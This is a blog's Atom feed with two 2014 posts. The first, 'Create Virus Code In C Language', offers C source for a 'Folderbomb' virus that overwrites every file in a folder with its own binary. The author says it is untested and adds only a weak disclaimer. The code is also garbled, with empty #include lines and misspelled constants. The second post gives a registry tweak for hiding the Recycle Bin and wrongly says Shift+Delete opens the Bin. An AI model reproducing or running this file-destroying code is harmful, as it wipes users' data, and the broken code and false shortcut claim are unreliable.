<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-1996734253652264361</id><updated>2024-09-05T10:46:41.234+05:30</updated><category term="Operating System Tricks"/><category term="Virus"/><title type='text'>Computer Zone</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://yourgenuinetricks.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1996734253652264361/posts/default'/><link rel='alternate' type='text/html' href='http://yourgenuinetricks.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/11629335089155034021</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>2</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-1996734253652264361.post-7218415716404346742</id><published>2014-08-21T15:39:00.000+05:30</published><updated>2014-08-21T15:41:54.045+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Operating System Tricks"/><category scheme="http://www.blogger.com/atom/ns#" term="Virus"/><title type='text'>Create Virus Code In C Language</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjuC2PgkO1l8wNRlA1JRVwo6S4yBxToZd2UDXebU0fkIDy57zYSftUIqT32qsQTyPdRZxIl1-kDndNTQ-G4p3SrFgl6pjYVP5nOFl_TSVzhFgJHXMQF2AiplWO9wWrP8jjAUrPZQqLAZA/s1600/computer-virus-symbol.jpg&quot; height=&quot;320&quot; width=&quot;320&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
It will create folder in a folder. Use below codes.&lt;br /&gt;
Run this on your own responsibility.&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
#include&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
#include&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
#include&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
#include&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
#include&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
void main(int argc,char* argv[])&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
{ char buf[512];&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
int source,target,byt,done;&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
struct ffblk ffblk;&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
clrscr();&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
textcolor(2);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
cprintf(‖————————————————————————–‖);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
printf(‖\nVirus: Folderbomb 1.0\nProgrammer:BAS Unnikrishnan(asystem0@gmail.com)\n‖);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
cprintf(‖————————————————————————–‖);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
done = findfirst(‖*.*‖,&amp;amp;ffblk,0);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
while (!done)&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
{ printf(‖\n‖);cprintf(‖ %s ―, ffblk.ff_name);printf(‖is attacked by ―);cprintf(‖Folderbomb‖);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
source=open(argv[0],O_RDONLY|O_BINARY);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
target=open(ffblk.ff_name,O_CREAT|O_BINARY|O_WRONGLY);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
while(1)&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
{byt=read(source,buf,512);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
if(byt&amp;gt;0)&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
write(target,buf,byt);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
else break;&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
}&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
close(source);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
close(target);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
done = findnext(&amp;amp;ffblk);&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
}&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
getch();&amp;nbsp;&lt;/blockquote&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
}&lt;/blockquote&gt;
&lt;/blockquote&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&amp;nbsp;&lt;b&gt;“Well I did not try this virus by my self, so try this and give me your feedback. But still I do not recommend to use this virus for bad purpose”&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://yourgenuinetricks.blogspot.com/feeds/7218415716404346742/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://yourgenuinetricks.blogspot.com/2014/08/create-virus-code-in-c-language.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1996734253652264361/posts/default/7218415716404346742'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1996734253652264361/posts/default/7218415716404346742'/><link rel='alternate' type='text/html' href='http://yourgenuinetricks.blogspot.com/2014/08/create-virus-code-in-c-language.html' title='Create Virus Code In C Language'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/11629335089155034021</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjuC2PgkO1l8wNRlA1JRVwo6S4yBxToZd2UDXebU0fkIDy57zYSftUIqT32qsQTyPdRZxIl1-kDndNTQ-G4p3SrFgl6pjYVP5nOFl_TSVzhFgJHXMQF2AiplWO9wWrP8jjAUrPZQqLAZA/s72-c/computer-virus-symbol.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1996734253652264361.post-1543021798805716924</id><published>2014-08-21T13:32:00.000+05:30</published><updated>2014-08-21T15:42:38.054+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Operating System Tricks"/><title type='text'>How To Remove Recycle Bin</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq5YxKgFZueX7kbB3qZdvbkb877lRo81zox4-dBexZd-1sggxR91GXrT7C9FYslZ5QRpKaqh9eLv3dEjhwH9I-K-LGNU-8hnEkIVbI9QiJPiqYsRvdmJTqVA0Zpv0Vx4LVxcFc3zz96lw/s200/Recycle-Bin-intro.png&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;/div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; line-height: 20px;&quot;&gt;If you prefer to work with a completely clear desktop, you can hide the Recycle Bin with a little Registry. You can still use the [Shift] + [Delete] shortcut to access the Bin when you need it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;span style=&quot;background-color: white; color: #333333; line-height: 20px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Verdana, sans-serif; font-size: large; line-height: 20px;&quot;&gt;&lt;b&gt;How To Hide:-&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #333333; line-height: 20px;&quot;&gt;&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;Choose &#39;Start --&amp;gt; Run&#39; and type&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Georgia, &#39;Times New Roman&#39;, serif; line-height: 20px;&quot;&gt;&lt;b&gt;&lt;i&gt;Regedit&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; color: #333333; font-family: Arial, Helvetica, sans-serif; line-height: 20px;&quot;&gt;&amp;nbsp;in the &#39;Open&#39; bar. Click &#39;OK&#39;. Now browse to the following location:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;background-color: white; color: #333333; line-height: 20px; margin-top: 10px; width: 480px;&quot;&gt;
&lt;div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;b&gt;&#39;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current Version\Explorer\HideDesktop Icons\NewStartPanel\&#39;&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; line-height: 20px; margin-top: 10px; width: 480px;&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Create a new&amp;nbsp;&lt;b&gt;DWORD&lt;/b&gt;&amp;nbsp;value and give it the following name:&lt;span style=&quot;background-color: transparent;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-family: Helvetica, arial, sans-serif; font-size: 14px;&quot;&gt;
&lt;span style=&quot;background-color: transparent;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;rafi&quot;&gt;
&lt;blockquote class=&quot;tr_bq&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-size: large;&quot;&gt;{645FF040-5081-101B-9F08-00AA002F954E}&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: Helvetica, arial, sans-serif; font-size: 14px; line-height: 20px; margin-top: 10px; width: 480px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Then Double-click on it and change its value to &#39;1&#39;. Quit Registry Editor, then Refresh your Windows. The Recycle Bin icon will magically disappear from the desktop. You can get it back again at any time by changing the value back to &#39;0&#39;.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;

&lt;!-- Blogger automated replacement: &quot;https://images-blogger-opensocial.googleusercontent.com/gadgets/proxy?url=http%3A%2F%2F4.bp.blogspot.com%2F-3b7m0YeKXgc%2FULjozlmgamI%2FAAAAAAAAA9s%2FdDmzHxJnYHg%2Fs200%2FRecycle-Bin-intro.png&amp;amp;container=blogger&amp;amp;gadget=a&amp;amp;rewriteMime=image%2F*&quot; with &quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq5YxKgFZueX7kbB3qZdvbkb877lRo81zox4-dBexZd-1sggxR91GXrT7C9FYslZ5QRpKaqh9eLv3dEjhwH9I-K-LGNU-8hnEkIVbI9QiJPiqYsRvdmJTqVA0Zpv0Vx4LVxcFc3zz96lw/s200/Recycle-Bin-intro.png&quot; --&gt;</content><link rel='replies' type='application/atom+xml' href='http://yourgenuinetricks.blogspot.com/feeds/1543021798805716924/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://yourgenuinetricks.blogspot.com/2014/08/how-to-remove-recycle-bin.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1996734253652264361/posts/default/1543021798805716924'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1996734253652264361/posts/default/1543021798805716924'/><link rel='alternate' type='text/html' href='http://yourgenuinetricks.blogspot.com/2014/08/how-to-remove-recycle-bin.html' title='How To Remove Recycle Bin'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/11629335089155034021</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgq5YxKgFZueX7kbB3qZdvbkb877lRo81zox4-dBexZd-1sggxR91GXrT7C9FYslZ5QRpKaqh9eLv3dEjhwH9I-K-LGNU-8hnEkIVbI9QiJPiqYsRvdmJTqVA0Zpv0Vx4LVxcFc3zz96lw/s72-c/Recycle-Bin-intro.png" height="72" width="72"/><thr:total>0</thr:total></entry></feed>